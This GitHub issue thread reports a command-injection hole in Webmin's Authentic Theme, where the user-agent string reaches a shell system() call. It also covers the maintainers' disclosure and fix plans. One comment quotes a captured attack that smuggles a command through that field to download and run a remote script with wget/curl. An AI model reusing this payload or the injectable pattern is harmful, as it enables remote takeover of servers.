Theme: Enabled Security Alerts posses an issue

[pbkwee]

https://github.com/qooob/authentic-theme/blob/ab1b72c0b3c154ba6ea72ec153b6eab59f14c76c/authentic-lib.pm

Line 48

{
$subject .= ' (' . get_system_hostname() . ')';
$message .= "\n\n" . get_html_framed_title() . "\n" . get_env('http_user_agent');
system(echo "$message" | mail -s "$subject" "$mail[2]");
}

That system call is an obvious exploitable issue. e.g. on login use a username with a backtick in to execute arbitrary code on the server.

Suggestion. Better escaping. Or don't use system calls with backticks.

[iliajie]

How are you going to exploit that when the content is not accessible to the user?

[iliajie]

Anyway, what is you call? How would you do it? :)

[pbkwee]

e.g. message contains username on a failed login. username is crafted to include backticks that escape out of that system call to execute code inside the username.

My call would be for you to remove the backticks in that system call. notify all your users that they are exploitable and to upgrade to a fixed version. then I'd look at better ways of cleaning the input to any 'evaled' code.

[iliajie]

Alright. I will take a look.

Meanwhile, $remote_user is taken from WebminCore global vars? How could you substitute it??

[pbkwee]

e.g. here is a slightly sanitized process listing from an actual server.

root 15905 0.0 2.1 156988 86588 ? S May23 0:00 _ /usr/share/webmin/authentic-theme/session_login.cgi
root 15915 0.0 0.0 4336 760 ? S May23 0:00 | _ sh -c echo "Webmin login page is accessed by unauthenticated user from 199.xxx.xxx.200 Webmin 1.795 on xxx.org (Debian Linux 8) (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || bash -c "wget http://xxx.org/mg -O /tmp/mg;curl -o /tmp/mg http://xxx.org/mg;sh /tmp/mg;rm -rf /tmp/mg"" | mail -s "Webmin login page access alert (xxx.org)" "root"

[pbkwee]

oh, looks like message is the http_user_agent. which of course you can customize. so its the provided user agent string not the username. avoid evals, if you have to use them, then carefully sanitize its inputs

[andreychek]

Any system call with certain characters in it could be exploited. The key would be to sanitize the input before sending it to a shell call.

One way to fix it would be to use another mechanism for sending email, perhaps talking to port 25 directly. That would avoid the shell altogether, as the shell does have risks. Webmin has built in methods for sending email too I believe, though I haven't experimented with those before.

[iliajie]

... are you saying that $remote_user will become anything that gets into login field??

[andreychek]

I haven't setup a working exploit yet, but it does look very concerning.

We'd need to test this to see what those values really are, but the concern is that $remote_user might be exactly what they type into the Username field, and the contents of "get_env('http_user_agent');" are anything they've set their browser USER_AGENT to be.

Both of those can be easily spoofed using a tool like wget or curl.

[iliajie]

$remove_user === $ENV{'REMOTE_USER'}, which is assigned ONLY after successful login!!

Which makes exploit NON-POSSIBLE!!

Prove otherwise!

[swelljoe]

He's saying user-agent is able to be set by the end user, and it is included in that system() call. Exploiting it is trivial (but I won't post it here).

Thanks for the heads up on this, @pbkwee !

I've pinged Jamie. We'll need a new version of the theme that fixes this. And a new Webmin to resolve it for everyone. That'll happen, ASAP. We'll disable theme notifications for now, as we really need to audit that whole thing.

How would you like to be credited on our security page, @pbkwee ?

I wonder if there's some way we can make this issue private, or remove the specific details until we've had a chance to roll a new Webmin release and get it into the repos? This is one that needs a fix before making it public.

In the future, you can email me and Jamie directly about issues like this; even though Authentic is Ilia's project, because it ships as part of Webmin, most security fixes have to go through us, anyway, so they get out to everyone as fast as possible. Jamie's emal is jcameron@webmin.com and mine is joe@virtuamin.com. You can also open private tickets on virtualmin.com.

[iliajie]

Ok, got it.. Sounds very possible that get_env('http_user_agent') might be the bad part as it's comming directly from the user. I will just comment it out and will see how to sanitize that part of the code.

Thanks for writing!!

[pbkwee]

@swelljoe no credit needed. Will email you in future (its peter at rimuhosting btw).

[swelljoe]

Ah, cool. Thanks, Peter.

So to wrap this one up:

• Jamie's on a plane, but has rented some satellite Internet to roll a new 1.800 release. Will be out in a few minutes.
• Ilia's gonna roll a 17.85 theme update today with this specific fix, and then try to get 18.00 of Authentic out tomorrow.
• We're gonna spend some time auditing Authentic again (this was a new feature, it happened after Jamie last audited the theme).
• Notifications are gonna be moved out of theme as they belong in core.